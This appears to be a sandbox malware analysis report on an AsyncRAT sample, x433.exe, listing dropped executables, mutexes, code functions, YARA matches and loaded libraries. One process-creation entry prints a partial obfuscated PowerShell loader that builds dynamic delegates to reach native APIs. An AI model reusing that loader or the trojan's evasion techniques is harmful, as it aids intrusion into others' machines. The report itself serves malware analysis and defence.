Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AE25CC NtQueryDirectoryFileEx,GetFileType,StrCpyW, 7_2_00000202C0AE25CC
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AE20E4 NtQuerySystemInformation,StrCmpNIW, 7_2_00000202C0AE20E4
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE262964 NtEnumerateValueKey,NtEnumerateValueKey, 9_2_000002BAAE262964
Deletes files inside the Windows folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_p0mqc12a.0ea.ps1 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\x433.exe Code function: 0_2_00007FFD9B890B95 0_2_00007FFD9B890B95
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042BDF6 1_2_0042BDF6
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A00D9 1_2_007A00D9
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A515C 1_2_007A515C
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007651EE 1_2_007651EE
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A39A3 1_2_007A39A3
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00766EAF 1_2_00766EAF
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00795980 1_2_00795980
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00767B71 1_2_00767B71
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0079D580 1_2_0079D580
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0079C7F0 1_2_0079C7F0
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00767F80 1_2_00767F80
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00793780 1_2_00793780
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B886BF2 2_2_00007FFD9B886BF2
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B8816D9 2_2_00007FFD9B8816D9
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B885E46 2_2_00007FFD9B885E46
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B882111 2_2_00007FFD9B882111
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B88D88A 2_2_00007FFD9B88D88A
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B889A20 2_2_00007FFD9B889A20
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B88BE28 2_2_00007FFD9B88BE28
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87DD68 3_2_00007FFD9B87DD68
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E339 3_2_00007FFD9B87E339
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BB13449 3_2_00007FFD9BB13449
Source: C:\Windows\System32\dllhost.exe Code function: 5_3_000002D8B0A441F8 5_3_000002D8B0A441F8
Source: C:\Windows\System32\dllhost.exe Code function: 5_3_000002D8B0A3DA30 5_3_000002D8B0A3DA30
Source: C:\Windows\System32\dllhost.exe Code function: 5_3_000002D8B0A31FC8 5_3_000002D8B0A31FC8
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140001CF0 5_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002D4C 5_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002434 5_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400031D0 5_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140001274 5_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A74DF8 5_2_000002D8B0A74DF8
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A6E630 5_2_000002D8B0A6E630
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A62BC8 5_2_000002D8B0A62BC8
Source: C:\Windows\System32\winlogon.exe Code function: 6_3_00000225DC6241F8 6_3_00000225DC6241F8
Source: C:\Windows\System32\winlogon.exe Code function: 6_3_00000225DC61DA30 6_3_00000225DC61DA30
Source: C:\Windows\System32\winlogon.exe Code function: 6_3_00000225DC611FC8 6_3_00000225DC611FC8
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC654DF8 6_2_00000225DC654DF8
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC64E630 6_2_00000225DC64E630
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC642BC8 6_2_00000225DC642BC8
Source: C:\Windows\System32\lsass.exe Code function: 7_3_00000202C0AC41F8 7_3_00000202C0AC41F8
Source: C:\Windows\System32\lsass.exe Code function: 7_3_00000202C0ABDA30 7_3_00000202C0ABDA30
Source: C:\Windows\System32\lsass.exe Code function: 7_3_00000202C0AB1FC8 7_3_00000202C0AB1FC8
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AF4DF8 7_2_00000202C0AF4DF8
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AEE630 7_2_00000202C0AEE630
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AE2BC8 7_2_00000202C0AE2BC8
Source: C:\Windows\System32\svchost.exe Code function: 8_3_000002A6612D1FC8 8_3_000002A6612D1FC8
Source: C:\Windows\System32\svchost.exe Code function: 8_3_000002A6612E41F8 8_3_000002A6612E41F8
Source: C:\Windows\System32\svchost.exe Code function: 8_3_000002A6612DDA30 8_3_000002A6612DDA30
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A661302BC8 8_2_000002A661302BC8
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A661314DF8 8_2_000002A661314DF8
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A66130E630 8_2_000002A66130E630
Source: C:\Windows\System32\dwm.exe Code function: 9_3_000002BAAE2441F8 9_3_000002BAAE2441F8
Source: C:\Windows\System32\dwm.exe Code function: 9_3_000002BAAE23DA30 9_3_000002BAAE23DA30
Source: C:\Windows\System32\dwm.exe Code function: 9_3_000002BAAE231FC8 9_3_000002BAAE231FC8
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE274DF8 9_2_000002BAAE274DF8
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE26E630 9_2_000002BAAE26E630
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE262BC8 9_2_000002BAAE262BC8
Source: C:\Windows\System32\svchost.exe Code function: 10_3_0000026A8799DA30 10_3_0000026A8799DA30
Source: C:\Windows\System32\svchost.exe Code function: 10_3_0000026A879A41F8 10_3_0000026A879A41F8
Source: C:\Windows\System32\svchost.exe Code function: 10_3_0000026A87991FC8 10_3_0000026A87991FC8
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879C2BC8 10_2_0000026A879C2BC8
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879CE630 10_2_0000026A879CE630
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879D4DF8 10_2_0000026A879D4DF8
Source: C:\Windows\System32\svchost.exe Code function: 11_3_000001795377DA30 11_3_000001795377DA30
Source: C:\Windows\System32\svchost.exe Code function: 11_3_00000179537841F8 11_3_00000179537841F8
Source: C:\Windows\System32\svchost.exe Code function: 11_3_0000017953771FC8 11_3_0000017953771FC8
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537AE630 11_2_00000179537AE630
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537B4DF8 11_2_00000179537B4DF8
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537A2BC8 11_2_00000179537A2BC8
PE file contains executable resources (Code or Archives)
Source: x4Shellcode.exe.0.dr Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Sample file is different than original file name gathered from version info
Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamex4host.exe4 vs x433.exe
Uses 32bit PE files
Source: x433.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: x4Shellcode.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: x4Shellcode.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: x433.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: x4host.exe.0.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x4host.exe.0.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x4host.exe.0.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x4usb.exe.2.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x4usb.exe.2.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x4usb.exe.2.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.x4host.exe.1bd60000.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.x4host.exe.1bd60000.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x4host.exe.0.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: x4host.exe.0.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: x4usb.exe.2.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: x4usb.exe.2.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: x433.exe, Program.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: x433.exe, Program.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Security.evtx.16.dr Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys\Ke
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.16.dr Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeZX**
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exez
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.dr Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Security.evtx.16.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exep
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.dr Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.dr Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.16.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.16.dr Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: System.evtx.16.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exed
Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.dr Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exec
Source: System.evtx.16.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.dr Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.16.dr Binary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeW
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeV
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeU
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.16.dr Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.dr Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.16.dr Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeN
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/70@2/4
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 5_2_0000000140002D4C
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0040151A SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,SysFreeString,SysFreeString,SysFreeString, 1_2_0040151A
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 1_2_004017A5
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 1_2_0078CBD0
Source: C:\Users\user\Desktop\x433.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x433.exe.log Jump to behavior
Source: C:\Users\user\AppData\Local\x4usb.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-141973e4e5834a36-inf
Source: C:\Users\user\Desktop\x433.exe Mutant created: \Sessions\1\BaseNamedObjects\St48A49HT4eAEQEuH
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6988:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-141973e4e5834a367d8e3ee9-b
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Mutant created: \Sessions\1\BaseNamedObjects\W30TmOEkpxCork0C
Source: C:\Users\user\Desktop\x433.exe File created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Jump to behavior
Source: x433.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: x433.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\x433.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: x433.exe ReversingLabs: Detection: 76%
Source: unknown Process created: C:\Users\user\Desktop\x433.exe "C:\Users\user\Desktop\x433.exe"
Source: C:\Users\user\Desktop\x433.exe Process created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe "C:\Users\user\AppData\Local\Temp\x4Shellcode.exe"
Source: C:\Users\user\Desktop\x433.exe Process created: C:\Users\user\AppData\Local\Temp\x4host.exe "C:\Users\user\AppData\Local\Temp\x4host.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6}
Source: unknown Process created: C:\Users\user\AppData\Local\x4usb.exe "C:\Users\user\AppData\Local\x4usb.exe"
Source: C:\Users\user\Desktop\x433.exe Process created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe "C:\Users\user\AppData\Local\Temp\x4Shellcode.exe" Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process created: C:\Users\user\AppData\Local\Temp\x4host.exe "C:\Users\user\AppData\Local\Temp\x4host.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6} Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
